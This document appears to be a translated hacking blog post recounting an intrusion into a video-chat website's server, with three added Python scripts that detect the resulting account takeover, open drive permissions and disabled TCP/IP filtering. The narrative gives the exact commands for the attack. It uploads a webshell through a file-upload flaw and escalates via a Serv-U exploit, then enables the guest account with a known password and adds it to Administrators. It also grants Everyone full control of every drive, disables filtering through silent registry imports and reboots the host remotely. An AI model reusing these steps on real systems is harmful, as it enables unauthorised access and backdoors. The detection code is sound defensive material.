1. Obtaining a webshell
A small test this evening. Because I am still a beginner I have not learned anything more advanced and can only manage this much ..........
It is already over, so there is no way to go back and take screenshots. I hope this little post is still understandable.
Today was a boring day. When you are bored at night you can go to a video chat site and watch the shows ~
I suddenly found one chat room that was especially popular: it already had 500 people (full), and after refreshing n times I still could not get in .......... even more depressing! :(
With nothing else to do, I decided to test how well the host was secured.
I pinged it to get the other side's IP address, and then went on to the terminal.
After a long search I finally found an upload-vulnerability page at http://www.xxxx.net/upfile_soft.asp and uploaded a webshell (the official Haiyang 2005 version). How to upload it is not worth going into; upload tools are everywhere now.
2. Elevating privileges and creating a user
After obtaining the webshell I logged in happily, only to find that I had no permissions at all. I could only browse the directory where my webshell sat (drives C, D, E and F could not be browsed), and I did not even have permission to delete files. Depressing ........
Back to the Server page to check which services the host had enabled. Finding that the host was running Terminal Services and Serv-U, ha. Now I scanned his IP address with SuperScan and saw from the banner that he was running Serv-U version 5.0.
Over to Wscript.Shell to see whether cmd commands would run. At first nothing happened: I entered net user and got no response. Tried again through Wscript.Shell, still nothing; entered net user once more, and this time the command returned the other side's user list. Haha, this is good. It can be taken !!
Uploaded the Serv-U privilege-escalation tool to the D:\a004\tggtwe\****.com\UploadSoft directory, renamed it test.exe, and went back to Wscript.Shell to run commands. Hey, a fat chicken (a fully owned box) will soon be ready ~
Run cmd commands through Wscript.Shell:
D:\a004\tggtwe\*****.com\UploadSoft\test.exe "net user guest /active:yes"  # activate the guest account; I like to use this account
D:\a004\tggtwe\*****.com\UploadSoft\test.exe "net user guest lvhuana"  # set the guest account's password to lvhuana
D:\a004\tggtwe\*****.com\UploadSoft\test.exe "net localgroup administrators guest /add"  # add guest to the Administrators group
OK. After the account is set up, run net localgroup administrators to check whether it was added successfully; the echo shows that it was. Run netstat -an and you can see that the terminal port is listening on the default 3389. OK, try connecting to it ~
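From the defender's side, the three net commands above leave a very recognisable trail in the Security log: a built-in account enabled, its password reset, and the account added to Administrators, all within seconds. The following is an added detection example, not code from the original post; the event records are constructed in a reduced form (time, event ID, target account, group), and the event IDs are the Vista/2008-and-later ones (4722, 4724, 4732).

```python
"""Flag the local-account takeover pattern (enable, reset password, add to a
sensitive group) in Windows Security audit events.

Added example, not part of the original post. Events are constructed here in
reduced form; a real collector would pull the same fields from the Security log.
"""
from collections import defaultdict
from datetime import datetime

ENABLED = 4722          # A user account was enabled
PASSWORD_RESET = 4724   # An attempt was made to reset an account's password
ADDED_TO_GROUP = 4732   # A member was added to a security-enabled local group

SENSITIVE_GROUPS = {"administrators", "remote desktop users"}
TIME_FMT = "%Y-%m-%d %H:%M:%S"

# Constructed sample: the three 'net' commands from the post as the host would
# audit them, plus an unrelated password reset that must not be flagged.
SAMPLE_EVENTS = [
    {"time": "2005-11-20 23:41:02", "id": 4722, "target": "guest"},
    {"time": "2005-11-20 23:41:09", "id": 4724, "target": "guest"},
    {"time": "2005-11-20 23:41:15", "id": 4732, "target": "guest", "group": "Administrators"},
    {"time": "2005-11-21 08:15:00", "id": 4724, "target": "alice"},
]


def find_account_takeovers(events, window_seconds=600):
    """Return [(account, first_time, last_time)] for every account that was
    enabled, had its password reset and was added to a sensitive group, with
    all three events falling inside `window_seconds`."""
    stages = defaultdict(dict)  # account -> {stage: earliest datetime}
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.strptime(ev["time"], TIME_FMT)
        account = ev["target"].lower()
        if ev["id"] == ENABLED:
            stages[account].setdefault("enabled", t)
        elif ev["id"] == PASSWORD_RESET:
            stages[account].setdefault("reset", t)
        elif ev["id"] == ADDED_TO_GROUP and ev.get("group", "").lower() in SENSITIVE_GROUPS:
            stages[account].setdefault("group", t)

    hits = []
    for account, seen in stages.items():
        if len(seen) == 3:  # all three stages observed for this account
            first, last = min(seen.values()), max(seen.values())
            if (last - first).total_seconds() <= window_seconds:
                hits.append((account, first.strftime(TIME_FMT), last.strftime(TIME_FMT)))
    return hits


if __name__ == "__main__":
    for account, first, last in find_account_takeovers(SAMPLE_EVENTS):
        print(f"account takeover pattern: {account} between {first} and {last}")
```

The window is deliberately short: a legitimate administrator rarely enables a built-in account, resets its password and promotes it to Administrators in one burst, so a ten-minute window catches the scripted sequence without flagging routine account maintenance spread over a day.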
3. TCP/IP filtering
Cannot connect !? Dizzy ...... Then I pulled out SuperScan to scan his 3389, and it did not show up either ...... (a firewall !? Oh, my luck really has run out .....)
No way around it. Back to Wscript.Shell and execute cmd commands:
D:\a004\tggtwe\*****.com\UploadSoft\test.exe "cacls.exe c:\ /e /t /g everyone:F"  # grant Everyone full control on drive C so it can be browsed
D:\a004\tggtwe\*****.com\UploadSoft\test.exe "cacls.exe d:\ /e /t /g everyone:F"  # grant Everyone full control on drive D so it can be browsed
D:\a004\tggtwe\*****.com\UploadSoft\test.exe "cacls.exe e:\ /e /t /g everyone:F"  # grant Everyone full control on drive E so it can be browsed
D:\a004\tggtwe\*****.com\UploadSoft\test.exe "cacls.exe f:\ /e /t /g everyone:F"  # grant Everyone full control on drive F so it can be browsed
At least now I could traverse the whole hard disk. I rummaged around the disk and could not find any firewall files, so now I knew: it must be his TCP/IP filtering! (Of course it could also be a server on an internal network; you can tell from ipconfig /all.)
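The four cacls commands above leave every drive root with Everyone:F, which is easy to audit for after the fact. The following is an added example, not code from the original post: it parses the text that cacls prints for a drive root and reports any object where an everyone-style trustee holds Full (F) or Change (C) access. The output below is constructed in the shape of `cacls <drive>` output; on a real host you would feed it the captured text.

```python
"""Audit cacls output for objects that grant Everyone (or an equivalent
everyone-style group) Full or Change access.

Added example, not part of the original post. SAMPLE_CACLS is constructed to
look like the output of `cacls C:\` and `cacls D:\` concatenated.
"""
import re

# Constructed sample: drive C was opened up to Everyone, drive D still only
# gives Everyone read access.
SAMPLE_CACLS = r"""C:\ BUILTIN\Administrators:(OI)(CI)F
    NT AUTHORITY\SYSTEM:(OI)(CI)F
    Everyone:(OI)(CI)F
D:\ BUILTIN\Administrators:(OI)(CI)F
    NT AUTHORITY\SYSTEM:(OI)(CI)F
    Everyone:(OI)(CI)R
"""

WORLD_TRUSTEES = {"everyone", "users", "builtin\\users",
                  "authenticated users", "nt authority\\authenticated users"}
INHERIT_FLAGS = re.compile(r"\([A-Z]{2}\)")  # (OI), (CI), (IO), (NP) ...
RISKY = {"F", "C"}  # Full control and Change


def parse_cacls(text):
    """Return {path: [(trustee, permission), ...]} from cacls output.

    The first ACE of each object shares a line with the path; the remaining
    ACEs are indented. Drive roots contain no spaces, so splitting the path
    at the first space is safe for the inputs this audit targets. Lines of a
    '(special access:)' ACE that carry no ':' are skipped rather than classified.
    """
    acls, path = {}, None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if raw[0] not in " \t":  # new object: "<path> <trustee>:<perm>"
            path, _, ace = raw.partition(" ")
            acls[path] = []
        else:
            ace = raw.strip()
        if ":" not in ace or path is None:
            continue
        trustee, _, perm = ace.partition(":")
        acls[path].append((trustee, INHERIT_FLAGS.sub("", perm)))
    return acls


def world_writable(acls):
    """Paths where an everyone-style trustee has F or C access, with the trustees."""
    result = {}
    for path, aces in acls.items():
        offenders = [t for t, p in aces if t.lower() in WORLD_TRUSTEES and p in RISKY]
        if offenders:
            result[path] = offenders
    return result


if __name__ == "__main__":
    for path, who in world_writable(parse_cacls(SAMPLE_CACLS)).items():
        print(f"{path} is writable by {', '.join(who)}")
```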
To get past TCP/IP filtering we can change the registry: export three keys from the registry, edit them, and import them back. Back to the Wscript.Shell command page:
D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit /e D:\a004\tggtwe\****.com\UploadSoft\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip"  # export the first part of the TCP/IP filtering settings from the registry
D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit /e D:\a004\tggtwe\****.com\UploadSoft\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip"  # export the second part of the TCP/IP filtering settings from the registry
D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit /e D:\a004\tggtwe\****.com\UploadSoft\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip"  # export the third part of the TCP/IP filtering settings from the registry
Then back to Stream or FSO, where 1.reg, 2.reg and 3.reg were found quietly lying there ~
Download 1.reg, 2.reg and 3.reg to your own hard disk and edit them, changing the TCP/IP filtering parts. In 1.reg find "EnableSecurityFilters"=dword:00000001 and change the last digit 1 to 0; then change 2.reg and 3.reg the same way. I will not belabour it ~
Then upload 1.reg, 2.reg and 3.reg back to the target machine (choose overwrite mode here, because we do not have permission to delete the original 1.reg, 2.reg and 3.reg). After the upload succeeds, back to the Wscript.Shell command:
D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit /s D:\a004\tggtwe\****.com\UploadSoft\1.reg"  # silently import the edited 1.reg into his registry
D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit /s D:\a004\tggtwe\****.com\UploadSoft\2.reg"  # silently import the edited 2.reg into his registry
D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit /s D:\a004\tggtwe\****.com\UploadSoft\3.reg"  # silently import the edited 3.reg into his registry
OK! After the import, restart the machine and the TCP/IP filtering problem is solved. So run this cmd command in Wscript.Shell:
D:\a004\tggtwe\****.com\UploadSoft\test.exe "iisreset /reboot /timeout:00"  # use his own IIS service to restart his machine; the /timeout:00 parameter makes it restart immediately
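The same regedit exports that the post edits are also the natural input for a defender's check: export the Tcpip key from a known-good build, export it again later, and compare the EnableSecurityFilters value (and the per-interface allowed-port lists) across control sets. The following is an added example, not code from the original post. The two .reg texts are constructed to look like regedit output; the interface GUID is a placeholder, and a real export is UTF-16LE with a BOM, so read it with open(path, encoding="utf-16").

```python
"""Audit TCP/IP filtering state from regedit exports of the Tcpip service key.

Added example, not part of the original post. BASELINE_REG and TAMPERED_REG are
constructed; the interface GUID is a placeholder. Real exports written by
regedit /e are UTF-16LE, so open them with encoding="utf-16".
"""
import re

KEY_LINE = re.compile(r"^\[(.+)\]$")
VALUE_LINE = re.compile(r'^"([^"]+)"=(.*)$')

# Constructed export shaped like regedit /e output for ...\Services\Tcpip.
BASELINE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip]
"Start"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"EnableSecurityFilters"=dword:00000001
"Hostname"="webhost"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{GUID-PLACEHOLDER}]
"TCPAllowedPorts"=hex(7):38,00,30,00,00,00,00,00
"""

# The same export after the edit the post describes: filtering switched off.
TAMPERED_REG = BASELINE_REG.replace(
    '"EnableSecurityFilters"=dword:00000001', '"EnableSecurityFilters"=dword:00000000')


def parse_reg(text):
    """Return {key_path: {value_name: raw_value}} for a .reg export.
    Handles regedit's backslash line continuation for long hex values."""
    keys, current, pending = {}, None, ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        pending = ""
        if line.endswith("\\"):  # value continues on the next line
            pending = line[:-1]
            continue
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        m = KEY_LINE.match(line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
        elif current is not None and (m := VALUE_LINE.match(line)):
            keys[current][m.group(1)] = m.group(2)
    return keys


def dword(raw):
    return int(raw[len("dword:"):], 16) if raw.startswith("dword:") else None


def multi_sz(raw):
    """Decode a REG_MULTI_SZ written as hex(7): UTF-16LE, NUL-separated."""
    if not raw.startswith("hex(7):"):
        return None
    data = bytes(int(b, 16) for b in raw[len("hex(7):"):].split(",") if b)
    return [s for s in data.decode("utf-16-le").split("\0") if s]


def filtering_enabled(reg):
    """Map each ...\\Tcpip\\Parameters key to True/False for EnableSecurityFilters."""
    state = {}
    for key, values in reg.items():
        if key.lower().endswith(r"\tcpip\parameters"):
            dw = dword(values.get("EnableSecurityFilters", ""))
            state[key] = dw is not None and dw != 0
    return state


def allowed_tcp_ports(reg):
    return {k: multi_sz(v["TCPAllowedPorts"]) for k, v in reg.items() if "TCPAllowedPorts" in v}


def audit(baseline_text, current_text):
    """Findings for the current export, judged on its own and against a baseline."""
    base = filtering_enabled(parse_reg(baseline_text))
    cur = filtering_enabled(parse_reg(current_text))
    findings = []
    for key, enabled in cur.items():
        if not enabled:
            findings.append(f"TCP/IP filtering is off under {key}")
            if base.get(key):
                findings.append(f"EnableSecurityFilters changed from 1 to 0 under {key}")
    return findings


if __name__ == "__main__":
    for line in audit(BASELINE_REG, TAMPERED_REG):
        print(line)
```

Because the post edits all three control sets, a check that only looks at CurrentControlSet can be fooled into reporting consistency; run the audit over each exported control set separately, and treat a change in EnableSecurityFilters or in the TCPAllowedPorts list as a configuration drift to investigate.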
After it runs, SuperScan can no longer scan him ~ He has restarted!
4. Logging on to the terminal successfully
After a long wait (actually not that long, but I could not sit still, hey ~), SuperScan can finally scan him again, and his 3389 port shows up. Haha, I finally succeeded. I pulled out the terminal client and logged on with user guest, password lvhuana!
Well, this spam article is now on www.2cto.com; time to stop working and go to sleep ~